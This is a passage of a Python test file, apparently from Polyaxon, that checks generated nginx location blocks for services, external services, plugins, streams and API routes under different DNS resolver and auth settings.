    rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        # Custom prefix and custom cluster suffix together.
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True
            )
            == expected
        )
@pytest.mark.proxies_mark
class TestGatewayExternalSchemas(BaseTestCase):
    """Nginx location configs for external services (no path rewrite, `-ext` upstream)."""
    # Tells BaseTestCase to initialize proxies settings for these tests.
    SET_PROXIES_SETTINGS = True
    def test_external_dns_resolver(self):
        """External location with resolver disabled, then enabled with a custom cluster."""
        settings.PROXIES_CONFIG.auth_enabled = False
        expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_use_resolver = False
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth="", rewrite=False, external=True
            )
            == expected
        )
        # NOTE(review): expected block has no auth_request lines even though
        # auth=get_auth_config() is passed below — external locations appear to
        # drop the auth snippet; confirm this is intended.
        expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
        settings.PROXIES_CONFIG.dns_use_resolver = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False, external=True
            )
            == expected
        )
    def test_external_dns_backend(self):
        """External location resolver address follows the DNS backend/cluster settings."""
        settings.PROXIES_CONFIG.auth_enabled = False
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.cluster.local valid=5s;
    proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth="", rewrite=False, external=True
            )
            == expected
        )
        expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False, external=True
            )
            == expected
        )
    def test_external_dns_prefix(self):
        """External location resolver address honors a custom dns_prefix."""
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver coredns.kube-system.svc.cluster.local valid=5s;
    proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver,
                auth=get_auth_config(),
                rewrite=False,
                external=True,
            )
            == expected
        )
        expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.new-system.svc.new-dns valid=5s;
    proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False, external=True
            )
            == expected
        )
@pytest.mark.proxies_mark
class TestGatewayRewriteExternalSchemas(BaseTestCase):
    """Nginx location configs for external services with path rewriting enabled."""
    # Tells BaseTestCase to initialize proxies settings for these tests.
    SET_PROXIES_SETTINGS = True
    def test_external_dns_resolver(self):
        """Rewrite-external location with resolver disabled, then enabled with a custom cluster."""
        settings.PROXIES_CONFIG.auth_enabled = False
        expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    rewrite_log on;
    rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_use_resolver = False
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth="", rewrite=True, external=True
            )
            == expected
        )
        # NOTE(review): as with the non-rewrite external tests, the expected
        # block carries no auth_request lines despite auth being passed — confirm.
        expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
        settings.PROXIES_CONFIG.dns_use_resolver = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True, external=True
            )
            == expected
        )
    def test_external_dns_backend(self):
        """Rewrite-external resolver address follows the DNS backend/cluster settings."""
        settings.PROXIES_CONFIG.auth_enabled = False
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth="", rewrite=True, external=True
            )
            == expected
        )
        expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver,
                auth=get_auth_config(),
                rewrite=True,
                external=True,
            )
            == expected
        )
    def test_external_dns_prefix(self):
        """Rewrite-external resolver address honors a custom dns_prefix."""
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver coredns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True, external=True
            )
            == expected
        )
        expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    resolver kube-dns.new-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True, external=True
            )
            == expected
        )
@pytest.mark.proxies_mark
class TestGatewayPluginsSchemas(BaseTestCase):
    """Nginx location configs for plugin services (one location per proxied service)."""
    # Tells BaseTestCase to initialize proxies settings for these tests.
    SET_PROXIES_SETTINGS = True
    def test_no_plugins(self):
        """No proxy_services configured -> no location blocks."""
        assert get_plugins_location_config(resolver="", auth="") == []
    def test_plugins(self):
        """One location block is produced per configured plugin service."""
        proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
        assert (
            len(
                get_plugins_location_config(
                    resolver="", auth="", proxy_services=proxy_services
                )
            )
            == 2
        )
    def test_plugins_dns_resolver(self):
        """Plugin locations with resolver disabled, then enabled with auth and a custom cluster."""
        settings.PROXIES_CONFIG.auth_enabled = False
        proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
        expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
    rewrite_log on;
    rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
    proxy_pass http://$1:6006;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
    rewrite_log on;
    rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
    proxy_pass http://$1:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_use_resolver = False
        resolver = get_resolver()
        # The generator returns a list of blocks; join to compare as one string.
        assert (
            "\n".join(
                get_plugins_location_config(
                    resolver=resolver, auth="", proxy_services=proxy_services
                )
            )
            == expected
        )
        expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
    proxy_pass http://$1:6006;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
    proxy_pass http://$1:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
        settings.PROXIES_CONFIG.dns_use_resolver = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        resolver = get_resolver()
        assert (
            "\n".join(
                get_plugins_location_config(
                    resolver=resolver,
                    auth=get_auth_config(),
                    proxy_services=proxy_services,
                )
            )
            == expected
        )
    def test_plugins_dns_backend(self):
        """Plugin location resolver address follows the DNS backend/cluster settings."""
        proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
        settings.PROXIES_CONFIG.auth_enabled = False
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
    proxy_pass http://$1:6006;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
    resolver kube-dns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
    proxy_pass http://$1:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            "\n".join(
                get_plugins_location_config(
                    resolver=resolver, auth="", proxy_services=proxy_services
                )
            )
            == expected
        )
        expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
    proxy_pass http://$1:6006;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.kube-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
    proxy_pass http://$1:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            "\n".join(
                get_plugins_location_config(
                    resolver=resolver,
                    auth=get_auth_config(),
                    proxy_services=proxy_services,
                )
            )
            == expected
        )
    def test_plugins_dns_prefix(self):
        """Plugin location resolver address honors a custom dns_prefix."""
        proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver coredns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
    proxy_pass http://$1:6006;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver coredns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
    proxy_pass http://$1:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            "\n".join(
                get_plugins_location_config(
                    resolver=resolver,
                    auth=get_auth_config(),
                    proxy_services=proxy_services,
                )
            )
            == expected
        )
        expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.new-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
    proxy_pass http://$1:6006;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.new-system.svc.new-dns valid=5s;
    rewrite_log on;
    rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
    proxy_pass http://$1:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            "\n".join(
                get_plugins_location_config(
                    resolver=resolver,
                    auth=get_auth_config(),
                    proxy_services=proxy_services,
                )
            )
            == expected
        )
@pytest.mark.proxies_mark
class TestGatewayStreamsSchemas(BaseTestCase):
    """Nginx /streams/ location config for the streams service."""
    # Tells BaseTestCase to initialize proxies settings for these tests.
    SET_PROXIES_SETTINGS = True
    def test_streams_location_with_auth_config(self):
        """Default upstream without auth, then a custom host/port with auth enabled."""
        expected = r"""
location /streams/ {
    proxy_pass http://polyaxon-polyaxon-streams;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        assert get_streams_location_config(resolver="", auth="") == expected
        settings.PROXIES_CONFIG.streams_port = 8888
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.streams_host = "foo"
        expected = r"""
location /streams/ {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    proxy_pass http://foo:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        assert (
            get_streams_location_config(resolver="", auth=get_auth_config()) == expected
        )
    def test_streams_location_with_dns_prefix(self):
        """Streams location gains a resolver line built from dns_prefix + cluster suffix."""
        settings.PROXIES_CONFIG.auth_enabled = False
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location /streams/ {
    resolver coredns.kube-system.svc.cluster.local valid=5s;
    proxy_pass http://polyaxon-polyaxon-streams;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert get_streams_location_config(resolver=resolver, auth="") == expected
        expected = r"""
location /streams/ {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.new-system.svc.new-dns valid=5s;
    proxy_pass http://polyaxon-polyaxon-streams;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_streams_location_config(resolver=resolver, auth=get_auth_config())
            == expected
        )
@pytest.mark.proxies_mark
class TestGatewayApiSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
    def test_api_location_config(self):
        """API locations (/, /api/v1/, /ui/, /sso/, /static/) across four upstream setups.

        Covers: default internal upstream, custom host:port, an external
        https host (port 443), and a forward proxy in front of that host.
        """
        expected = r"""
location = / {
    proxy_pass http://polyaxon-polyaxon-api;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /api/v1/ {
    proxy_pass http://polyaxon-polyaxon-api;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /ui/ {
    proxy_pass http://polyaxon-polyaxon-api;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /sso/ {
    proxy_pass http://polyaxon-polyaxon-api;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /static/ {
    proxy_pass http://polyaxon-polyaxon-api;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
""" # noqa
        assert get_api_location_config(resolver="") == expected
        # Custom internal host:port upstream.
        settings.PROXIES_CONFIG.api_port = 8888
        settings.PROXIES_CONFIG.api_host = "foo"
        expected = r"""
location = / {
    proxy_pass http://foo:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /api/v1/ {
    proxy_pass http://foo:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /ui/ {
    proxy_pass http://foo:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /sso/ {
    proxy_pass http://foo:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Origin "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $http_host;
    proxy_buffering off;
}
location /static/ {
    proxy_pass http://foo:8888;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
